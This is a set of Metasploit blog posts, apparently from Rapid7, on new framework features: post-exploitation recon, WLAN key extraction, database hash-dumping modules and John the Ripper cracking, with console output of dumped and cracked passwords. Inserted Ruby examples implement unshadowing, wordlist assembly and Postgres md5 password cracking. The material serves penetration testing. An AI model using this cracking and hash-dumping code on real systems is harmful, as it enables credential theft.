Metasploit development moves fast. Blindingly fast, fueled by tons of open source contributors -- which is one of the reasons why we moved away from our tried and true SVN repository and on to GitHub. Now that we're on a more modern, more social development platform, we have all new ways to get overwhelmed with the pace of change on the Framework, especially since contributor code is that much easier to integrate now. So, in order to ensure that the more notable week-over-week changes get their due, I'll be publishing a weekly blog post with a headline-style overview of the latest changes that ship out with our scheduled weekly updates.


FastLib Library Compression


Long-time Metasploit Framework users like to complain about Framework's start-up time. Measured in seconds, it does sometimes feel like it takes a lot longer, especially when you're developing new Framework functionality and restarting a lot.


To be fair, it takes a few cycles to get all those hundreds of thousands of lines of interpreted Ruby code from disk into memory. In the spirit of alleviating this popular pain point, though, we've included an alpha version of FastLib. Developed in-house and released as open source like the rest of the Metasploit Framework, FastLib should knock a couple of seconds off that dreaded startup time. If you have other complex Ruby projects, you might want to take a look at the implementation over on GitHub at


In addition to speeding up library loads, FastLib supports compression, obfuscation, and custom encryption. The integration of FastLib into the Metasploit Framework allows modules to be combined into FastLib archives and loaded from any module directory in the standard load path. FastLib is alpha-quality and likely to change as the code continues to improve. A future blog post will detail methods for optimizing a Metasploit Framework installation for embedded devices using FastLib.


New Exploits


Legacy applications are the bread and butter of penetration testing -- those usually forgotten, universally unloved, and sometimes rogue applications that are quietly waiting to provide a foothold into the organization's critical infrastructure. In that vein, we have new modules this week for legacy versions of IPSwitch WhatsUp Gold and Serv-U FTP Server. We also have exploits for the recently disclosed vulnerabilities in CCMPlayer and Avid Media Composer, submitted by community contributors Rho and vt, respectively.




For those of you who rely on the msfupdate command to track Framework development, you already have these sitting in your local checkout. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new Framework hotness today when you check for updates through the Software Updates menu under Administration.


For more details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.



Over the last few weeks the Metasploit team at Rapid7 has engaged in an overhaul of our development process. Our primary goals were to accelerate community collaboration and better define the scopes of our open source projects. The first step was to migrate all open source development to GitHub. This has resulted in a flood of contributors and lots of great new features and content.


One controversial change involved removing old, buggy automation tools that simply didn't meet the quality bar, or our scope for the framework. This resulted in the removal of file_autopwn and db_autopwn. Both of these modules were easy to use, but were more likely to fall over and crash than produce useful results. The db_autopwn code started off as a joke and never reached a point where it was actually stable. For anyone who really wants to use db_autopwn, a community contributor maintains it as a plugin in a GitHub fork.


The Metasploit products (including the open source Metasploit Framework) support automation at multiple levels. How you automate the product depends on what type of task you are working on and the granularity needed. The list below is not comprehensive; there are an infinite number of ways to extend, include, and automate Metasploit, but these are the best supported and most common methods.



The Metasploit Console


Resource Scripts


The console (msfconsole or msfpro) supports basic automation using Resource Scripts. These scripts contain a set of console commands that are executed when the script loads. In addition to basic console commands, these scripts are also treated as ERB templates. ERB is a way to embed Ruby code directly into a document. This allows you to call APIs that are not exposed via console commands and even programmatically generate and return a list of commands based on your own logic. Resource Scripts can be specified with the -r option to the Metasploit Console and ~/.msf4/msfconsole.rc is automatically executed on startup if it exists. Resource Scripts can also be executed from the console prompt through the resource command. For more on this approach, see Automating the Metasploit Console.
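To make the ERB point concrete, here is an added example (not code from the Framework itself) that renders a small ERB-templated resource script into the plain console commands msfconsole would execute. The host list, workspace name and commands in SAMPLE_RC are constructed for the example; the point is that Ruby inside <% %> runs first and can generate the command list, which is exactly what lets a resource script loop over hosts or call APIs the console does not expose as commands.

```ruby
require 'erb'

# Constructed sample resource script. msfconsole treats .rc files as ERB, so the
# Ruby between <% %> runs before the resulting lines are handed to the console.
# The host list and workspace name are assumptions for this example.
SAMPLE_RC = <<~'RC'
  <% hosts = %w[10.0.0.5 10.0.0.6] -%>
  workspace -a weekly
  <% hosts.each do |h| -%>
  db_nmap -sV <%= h %>
  <% end -%>
  hosts -c address,os_name
RC

# Render the ERB template into plain text, trimming the newlines left behind
# by code-only lines (the "-%>" convention).
def render_resource_script(template)
  ERB.new(template, trim_mode: '-').result(binding)
end

# Turn the rendered text into the command list a resource-script loader would
# feed to the console one line at a time, skipping blanks and comments.
def resource_commands(template)
  render_resource_script(template)
    .lines
    .map(&:strip)
    .reject { |l| l.empty? || l.start_with?('#') }
end

if __FILE__ == $PROGRAM_NAME
  puts resource_commands(SAMPLE_RC)
end
```

Saving the same template as ~/.msf4/msfconsole.rc or passing it with -r would run the generated commands at startup; rendering it stand-alone like this is a cheap way to check what a template expands to before handing it to the console.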




The console (msfconsole or msfpro) also supports the concept of Plugins. Plugins add new console commands that provide a utility or automation function. The flexibility of the Ruby language allows Plugins to do nearly anything, from exposing new automation capabilities, to providing socket-level content filtering to prevent the tripping of a remote IDS. Direct integration with Nexpose, Nessus, and OpenVAS from the console is accomplished through plugins. The full list of default plugins can be found in the GitHub repository. Plugins are the suggested way to work on new console commands and share them with the wider community.


Auxiliary Module Custom Commands


Auxiliary modules are defined as any Metasploit module that performs a remote operation of some sort, but doesn't take an actual payload like an exploit. Auxiliary modules handle things like reconnaissance, authentication bypass, network sniffing, and vulnerability discovery. One little-used feature of Auxiliary modules is the ability to define new console commands from within the module context. The user would enter "use auxiliary/module/name" and, if the module exposes new commands, these would become available to the console. One example is the TrendMicro ServerProtect File Access module.



Custom Auxiliary Modules


Although we do not accept modules that run other modules into the Metasploit Framework proper, these are trivial to create as custom modules and allow for any form of automation, exposed through any supported user interface. The major advantage to writing automation tools as Auxiliary modules is that they will usually work just fine from Metasploit Community Edition or Metasploit Pro, as well as third-party interfaces like MSFGUI. One example of an existing automation module in the framework (and one that is still being reviewed from a design perspective) is browser_autopwn. This module will automatically configure exploit modules and redirect the target to the appropriate one. The reason why this isn't really a good fit for the framework is that payload and target selection are hardcoded to values that may not always work. We are looking into better ways to handle client-side exploit automation, but until then, it serves as an in-tree example of Auxiliary module automation.



Metasploit Remote API


The Metasploit Framework and Metasploit Pro both support automation using a documented Remote API. On the framework side, this exposes a wide range of functionality at the lowest level, allowing the caller to run modules, interact with sessions, and generally access the backend of the Metasploit instance. Metasploit Pro builds on this by offering access to the commercial product features through the same API. In fact, the Metasploit Pro user interface uses this same API to drive the backend automation. The product was built with automation and extensibility in mind. Using Metasploit Pro with the Remote API makes it painless to remotely automate a penetration test, across multiple instances of Pro, all from a central location. Rapid7 customers are using this today to conduct automated exploitation during off-hour scan windows and to automate things like password testing across dozens of remote sites at once, with centralized reporting. You can find examples of the Pro API automation in the documentation directory of the framework. The msfrpc-client gem is available for Ruby developers.



Ruby Programming


At the end of the day, the Metasploit Framework is a development environment more than it is a standalone product. The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new. Each of the previous methods makes it easy to load custom Ruby code and leverage that code in a useful way; to get the most out of the Metasploit products, it helps to become familiar with the framework API itself. Nearly all of the framework code is available under an open source license and the latest changes can be found in the main GitHub repository. Metasploit Pro customers are encouraged to contact support (and likely, from there, the development team) about any ideas they have for development or integration. Nearly any code written for the Metasploit Framework is drop-in compatible with Metasploit Pro.





If you have any questions about automation, the Discussion forum in the Rapid7 Community is a great way to get started. For real-time discussion, the #metasploit channel on the FreeNode IRC network is a great resource as well.

The Metasploit Framework continues to grow and expand with the support of the community.

There have been many new features added to the Metasploit Framework over the past month.

I am very excited to be able to share some of these new developments with you.


Mubix's Recon Modules

Mubix's post-exploitation modules from his Derbycon talk are now in the repository. The resolve_hostname module, originally called 'Dig', will take a given hostname and resolve the IP address for that host from the Windows victim. The enum_termserv module will dump Windows RDP connections from the victim machine, to give you a list of other potential targets. The computer_browser_discovery module, formerly called netdiscovery, taps the victim machine's Computer Browser Service via Railgun. This will return a list of all machines available on the same broadcast domain as the victim machine. An addition to Mubix's original module has been made to give users the option to create host records in the Metasploit database for any hosts discovered this way.


[*] [2011.12.05-15:35:57] Found 4 systems.


...[*] [2011.12.05-15:36:02] Netdiscovery Results



----     --            -------------   -------  -------

69635  WINXPTEST       5.1

69635   MELODIE         6.1

8556551  DMALONEY-VDSDA  5.2



Windows Wireless LAN

There is a new group of Windows post modules under post/windows/wlan. These modules all use Railgun to hook the Windows WLAN API. There are currently four modules in this group:


wlan_profile: This module will enumerate all of the wireless LAN interfaces on the machine. It will then enumerate all the saved wireless profiles on each interface. If the Meterpreter session has sufficient privileges it will also decrypt the wireless key material. One caveat to this last part is that Windows XP does not actually store the WPA passphrase. It instead stores the derived key, which was derived using the PBKDF2() function. Since this is all Windows stores, it is surely still usable in this format, but it does not do you any good from a password-reuse standpoint. On the TODO list is another module that will make the victim machine connect to a specific network, with the option of using one of the pre-saved profiles or passing it your own profile.


msf  post(wlan_profile) > set SESSION 1


msf  post(wlan_profile) > exploit



[+] Wireless LAN Profile Information

GUID: {eb566b46-0140-4eca-800a-a5e01fae7251} Description: Intel(R) Centrino(R) Advanced-N 6230 State: The interface is connected to a network.

Profile Name: derbycon

<?xml version="1.0"?>

<WLANProfile xmlns="">

wlan_current_connection: This module will enumerate all of the wireless LAN interfaces on the victim machine, and then get information about the current wireless connection on each one. This information includes the MAC address of the access point, the SSID, the BSS type, the connection type, signal strength, RX/TX rates, security settings, encryption and authentication algorithms used, and whether 802.1x authentication is used on the network.


msf  post(wlan_current_connection) > set SESSION 1


msf  post(wlan_current_connection) > exploit



[+] GUID: {eb566b46-0140-4eca-800a-a5e01fae7251}

Description: Intel(R) Centrino(R) Advanced-N 6230

State: The interface is connected to a network.

          Mode: connection initiated by wireless service automatically using a persistent profile.

          Profile: Skynet

          SSID: Skynet

          AP MAC: xx:xx:xx:xx:xx:xx

          BSS Type: Infrastructure

          Physical Type: Extended rate PHY type

          Signal Strength: 94

          RX Rate: 54000

          TX Rate: 54000

          Security Enabled: Yes

          oneX Enabled: No

          Authentication Algorithm: WPA-PSK

          Cipher Algorithm: TKIP



[*] WlanAPI Handle Closed Successfully

[*] Post module execution completed



wlan_bss_list: This module will enumerate all of the wireless LAN interfaces on the machine. It will then scan with each interface for new wireless networks and record the information about all of the available wireless networks. This information includes a lot of the same information pulled down by the current_connection module.


msf  post(wlan_bss_list) > set SESSION 1


msf  post(wlan_bss_list) > exploit



[*] {"GetLastError"=>0, "return"=>0, "ppWlanBssList"=>5282784}

[*] Number of Networks: 16

[+] SSID: horton

          BSSID: xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -90

          Signal: 16



[+] SSID: Skynet

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: 802.11n PHY type

          RSSI: -25

          Signal: 99



[+] SSID: WIN_930

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -89

          Signal: 18



[+] SSID: The Dragisic Network

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -86

          Signal: 23



[+] SSID: jacob1

          BSSID: xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -76

          Signal: 40



[+] SSID: WIN_BA74

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -78

          Signal: 36



[+] SSID: MonroeMFC

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -90

          Signal: 16



[+] SSID: starmonster

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -81

          Signal: 31



[+] SSID: Eric Home

          BSSID:  xx:xx:xx:xx:xx:xx  

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -87

          Signal: 21



[+] SSID: linksys

          BSSID:  xx:xx:xx:xx:xx:xx

          Type: Infrastructure

          PHY: High-rate DSSS (HRDSSS)

          RSSI: -74

          Signal: 43



[+] SSID: Tarheel_Country

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -72

          Signal: 46



[+] SSID: W32.Blaster.Worm

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -80

          Signal: 33



[+] SSID: Leidi

          BSSID:  xx:xx:xx:xx:xx:xx

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -88

          Signal: 20



[+] SSID: theriault

          BSSID:  xx:xx:xx:xx:xx:xx

          Type: Infrastructure

          PHY: 802.11n PHY type

          RSSI: -81

          Signal: 31



[+] SSID: EckerNet

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -75

          Signal: 41



[+] SSID: Belkin_G+MIMO_Wireless_E5A125

          BSSID:  xx:xx:xx:xx:xx:xx 

          Type: Infrastructure

          PHY: Extended rate PHY type

          RSSI: -87

          Signal: 21



[*] WlanAPI Handle Closed Successfully

[*] Post module execution completed



wlan_disconnect: This module takes an integer as an argument. That integer is the index of the interface you want to target. Most machines will likely only have one wireless interface, so this option can be left on the default value of 0. The module will disconnect the specified wireless interface from whatever network it is currently connected to. This will be more useful when the module to connect the interface to a specified network is



Database Hash dumping

There are some interesting new auxiliary modules in the framework now too. These are hashdump modules for several of the more popular database servers: MSSQL, MySQL, Postgres, and Oracle. The modules take supplied credentials and log on to the databases on a given port across a supplied RHOSTS list. They will then attempt to dump all the database user password hashes. If this succeeds, the hashes are stored in a CSV as loot for further cracking. These modules will also attempt to save all the database, table, and instance names from the database; these are used for wordlist building when attempting to crack the hashes.



msf  auxiliary(mssql_hashdump) > exploit



[*] Instance Name: "WINTEST2008"

[+] - Saving mssql05.hashes = sa:010051aa13a36f6efb5296ee8b804138173e0696d0892c52fcb6

[+] - Saving mssql05.hashes = ##MS_PolicyEventProcessingLogin##:010031b4ae8d43c66a1a17f5f5e7da86a1764dc48ddc6 babdd9e

[+] - Saving mssql05.hashes = ##MS_PolicyTsqlExecutionLogin##:010094044117b73bd4051b810dab0b7db5e3cbd8bb402c3 6ffe0

[+] - Saving mssql05.hashes = user1:01006dcfe5ee776f7fa8210a33c5bf2aaaef2b5ee25f315a2890

[+] - Saving mssql05.hashes = user2:0100acc65dd1643d5a43320af56bc37861e6ba4af7b9a0e866ee

[+] - Saving mssql05.hashes = user3:0100e838d7b99cedfb902161be09e3e859f2aca099f5eb49684b

[+] - Saving mssql05.hashes = user4:0100a9ec455822cb06dcb752390725649dbf669aa1994669a1ce

[+] - Saving mssql05.hashes = user5:0100a5a9092099814984bbbf0aa851477b5edbd1a5406ba1bebb

[+] - Saving mssql05.hashes = user6:01001d924e4d071f25849387181a2c1b0336b60baecf3e78b874

[+] - Saving mssql05.hashes = user7:01001e0a03d8f99fb1355ae09ebde36686f1041c072e4111f999

[+] - Saving mssql05.hashes = user8:0100c506c9b67d8592f9f36982c82f8907ac38258b1fe358a84c

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf  auxiliary(mssql_hashdump) >


Linux unshadow

The auxiliary/analyze/jtr_unshadow module is another new addition. This module exists for scenarios where you can pull arbitrary files off victim machines in less standard ways, such as directory traversal attacks. It will take paths to locally stored passwd and shadow files. It will then unshadow the passwd file and store it as loot for future cracking.
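For readers who have not seen what "unshadowing" actually does, here is an added Ruby example (not the module's own code) that performs the same join on two constructed files: the second field of each passwd line ('x') is replaced by the hash field from the matching shadow entry, and locked accounts ('*' or '!') are filtered out since they carry nothing crackable. The passwd and shadow contents and the $6$ hash strings are constructed placeholders, not real hashes.

```ruby
# Constructed sample passwd and shadow contents. The hash strings are
# placeholders in the $6$ (sha512crypt) shape, not real hashes.
SAMPLE_PASSWD = <<~'PASSWD'
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  alice:x:1000:1000:Alice:/home/alice:/bin/bash
PASSWD

SAMPLE_SHADOW = <<~'SHADOW'
  root:$6$EXAMPLESALT$EXAMPLEHASHROOT:15600:0:99999:7:::
  daemon:*:15600:0:99999:7:::
  alice:$6$EXAMPLESALT$EXAMPLEHASHALICE:15600:0:99999:7:::
SHADOW

# Parse shadow into user => hash field. The remaining aging fields are ignored.
def shadow_hashes(shadow_text)
  shadow_text.each_line.with_object({}) do |line, h|
    user, hash = line.chomp.split(':', 3)
    next if user.nil? || user.empty?
    h[user] = hash
  end
end

# Replace the 'x' placeholder in passwd's second field with the shadow hash,
# which is what unshadow(8) produces. Users missing from shadow keep their field.
def unshadow(passwd_text, shadow_text)
  hashes = shadow_hashes(shadow_text)
  passwd_text.each_line.map do |line|
    fields = line.chomp.split(':', -1)   # -1 keeps trailing empty fields
    next line.chomp if fields.length < 2
    fields[1] = hashes.fetch(fields[0], fields[1])
    fields.join(':')
  end
end

# Only entries with a real hash are worth keeping as loot: locked accounts
# ('*', '!') and empty password fields are dropped.
def crackable_entries(unshadowed_lines)
  unshadowed_lines.reject do |l|
    f = l.split(':', -1)[1]
    f.nil? || f.empty? || f.start_with?('*', '!')
  end
end

if __FILE__ == $PROGRAM_NAME
  puts crackable_entries(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW))
end
```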


New Password Cracking Options

Building on the success of our first John the Ripper (JtR) cracking module, we now have a few more. There are John the Ripper modules for cracking Microsoft SQL Server, MySQL, Oracle, and Linux hashes. They look for the database hashes in the loot files created by the previously mentioned hashdump modules. All of these modules will assemble a wordlist based on a number of things:



  1. The default wordlist we ship with
  2. All usernames and passwords currently stored in the creds table
  3. All hostnames in the hosts table
  4. Any passwords already cracked by JtR (in the .pot file)
  5. Any captured MSSQL instance names
  6. Any database and table names gathered by db hashdump modules
  7. An optional user supplied wordlist


All of these items are pulled together and uniqued to create a wordlist for cracking. The module will then attempt limited password cracking using this wordlist and some fast and easy cracking rules. These modules are not a thorough cracking attempt, but rather an attempt to crack the quick and easy hashes. Any hashes that are successfully cracked are then stored as creds in the database.



msf  auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast

msf  auxiliary(jtr_mssql_fast) > exploit



[*] Cracking MSSQL Hashes

[*] Cracking MSSQL05 Hashes

[*] HashList: /tmp/jtrtmp20111205-10995-2yklnu-0

[*] Trying Wordlist: /tmp/jtrtmp20111205-10995-1s8wt88-0

guesses: 5  time: 0:00:01:20 DONE (Mon Dec  5 15:13:41 2011)  c/s: 3436K  trying: �tude1900

Use the "--show" option to display all of the cracked passwords reliably

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: WINTEST2008      (user6)

[*] Output: password2        (user2)

[*] Output: password2        (user1)

[*] Output: user3            (user3)

[*] Output: password8        (user8)

[*] Trying Rule: All4...

Warning: mixed-case charset, but the current hash type is case-insensitive;

some candidate passwords may be unnecessarily tried more than once.

guesses: 0  time: 0:00:02:05 DONE (Mon Dec  5 15:15:47 2011)  c/s: 3947K  trying: |||}

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: Remaining 6 password hashes with 6 different salts

[*] Trying Rule: Digits5...

guesses: 0  time: 0:00:00:00 DONE (Mon Dec  5 15:15:47 2011)  c/s: 2898K  trying: 89092

[*] Output: Loaded 11 password hashes with 11 different salts (MS-SQL05 [ms-sql05])

[*] Output: Remaining 6 password hashes with 6 different salts

[*] user1:password2:



[*] user2:password2:



[*] user3:user3:



[*] user6:WINTEST2008:



[*] user8:password8:






[*] 5 password hashes cracked, 6 left



[*] 5 hashes were cracked!

[+] Host: Port: 1055 User: user1 Pass: password2

[+] Host: Port: 1055 User: user2 Pass: password2

[+] Host: Port: 1055 User: user3 Pass: user3

[+] Host: Port: 1055 User: user6 Pass: WINTEST2008

[+] Host: Port: 1055 User: user8 Pass: password8

[*] Auxiliary module execution completed

msf  auxiliary(jtr_mssql_fast) >



One thing to note is that the jtr_linux module is not listed as fast mode. This is because this module can be very slow depending on the type of Linux hashes it is trying to crack. If the hashes were created using crypt(3) this module can be VERY slow.


There is also one other hash cracking module that does not use JtR. This is the postgres_md5_crack module. JtR currently does not support Postgres md5 hashes. These hashes are created by taking the password, appending the username, and MD5 hashing the result. The postgres_md5_crack module generates a wordlist the same way the JtR modules do. It then takes each word, appends the username of the hash being tried, MD5 hashes it, and compares the result against the stored hash. If it's a match, it saves the discovered cred in the database. This module can actually move surprisingly fast, but is not necessarily a thorough cracking method.
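The wordlist assembly described under New Password Cracking Options and the Postgres md5 check described just above share the same building blocks, so here is one added Ruby example (not the modules' own code) covering both. It assembles and dedupes a wordlist from constructed stand-ins for the seven sources listed, applies a few cheap rules of the "fast and easy" kind, and checks each candidate against a Postgres md5 hash built the way the paragraph describes: "md5" followed by the hex MD5 of password + username. The sample credentials, host names, instance names and the 'reporting' role are constructed; the stored hash is generated inside the block from a constructed password so the run is self-contained. The example also shows why this scheme is cheap to test: the username is the only salt, so a reused hostname or instance name is found in a fraction of a second.

```ruby
require 'digest'

# Constructed stand-ins for the seven wordlist sources the post lists.
DEFAULT_WORDLIST = %w[password password1 letmein welcome]
CREDS_TABLE      = [%w[sa Summer2011], %w[dbadmin Welcome1]]   # [user, pass] pairs
HOST_NAMES       = %w[wintest2008 db01 files]
POT_FILE_CRACKED = %w[password2 user3]
MSSQL_INSTANCES  = %w[WINTEST2008 SQLEXPRESS]
DB_TABLE_NAMES   = %w[payroll employees]
USER_SUPPLIED    = %w[skynet derbycon]

# Pull every source together and dedupe, as the JtR modules do before cracking.
def build_wordlist(default:, creds:, hosts:, pot:, instances:, db_names:, extra: [])
  words = []
  words.concat(default)
  creds.each { |user, pass| words << user << pass }   # usernames are candidates too
  words.concat(hosts, pot, instances, db_names, extra)
  words.reject(&:empty?).uniq
end

# A few cheap rules: as-is, lowercase, capitalised, and one trailing digit.
def fast_rules(word)
  base = [word, word.downcase, word.capitalize].uniq
  (base + base.flat_map { |w| (0..9).map { |d| "#{w}#{d}" } }).uniq
end

# Postgres md5 scheme: "md5" + hex(md5(password + username)). The username is
# the only salt, which is why a wordlist check against it is so fast.
def postgres_md5(password, username)
  'md5' + Digest::MD5.hexdigest(password + username)
end

# Try every wordlist entry (with rules) against one stored hash.
# Returns the matching plaintext, or nil if nothing in the list matches.
def crack_postgres_md5(stored_hash, username, wordlist)
  wordlist.each do |word|
    fast_rules(word).each do |cand|
      return cand if postgres_md5(cand, username) == stored_hash
    end
  end
  nil
end

# Constructed target: a role whose password was reused from a hostname.
TARGET_USER = 'reporting'
TARGET_HASH = postgres_md5('Wintest2008', TARGET_USER)

if __FILE__ == $PROGRAM_NAME
  wl = build_wordlist(default: DEFAULT_WORDLIST, creds: CREDS_TABLE, hosts: HOST_NAMES,
                      pot: POT_FILE_CRACKED, instances: MSSQL_INSTANCES,
                      db_names: DB_TABLE_NAMES, extra: USER_SUPPLIED)
  puts "wordlist size: #{wl.length}"
  puts "#{TARGET_USER}: #{crack_postgres_md5(TARGET_HASH, TARGET_USER, wl).inspect}"
end
```

The same md5(password + username) computation is what a Postgres server does when it verifies an md5 login, so this is also the quickest way to confirm that a role's stored hash matches a password you already know from the creds table.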


These are just some of the new features that have been added to the Metasploit Framework over the past month. Stay tuned as there are sure to be even more great new features coming. If there is something that Metasploit doesn't do, that you think it should, let us know. Better yet, try your hand at writing it yourself and send us a Pull Request on GitHub! Cheers for now.

In any penetration test that involves brute forcing passwords, you may want to increase your chances of a successful password audit by adding custom wordlists specific to the organization that hired you. Some examples:


  • If you are security testing a hospital, you may want to add a dictionary with medical terms.
  • If you're testing a German organization, users are likely to use German passwords, so you should add a German wordlist.
  • Another good idea is to build a custom wordlist based on the organization's website (try the Wordlist Ruby gem to generate a wordlist based on a URL scrape).


Once you have a wordlist, you can easily add it to Metasploit. Here's a video to show you how:



Adding custom wordlists this way will work in Metasploit Express and Metasploit Pro. If you want to try it out, get your free Metasploit Pro trial today!


Metasploit and PTES

Posted by jcran Dec 2, 2011

One of our Metasploit contributors, Brandon Perry, has put together a document mapping the recently released Penetration Testing Execution Standard (PTES) to the modules and functionality in the Framework. PTES is a push from a group of testers fed up with the lack of guidance and the disparate sources of basic penetration testing information. Brandon's document does a great job detailing disparate parts of the framework in the context of PTES.


Hopefully Brandon will continue to build this document out, as it is a handy resource. This helps make the PTES guidance actionable, and is a good read whether you're just getting started or you're an old hand with the framework.


Have a look at the document here.
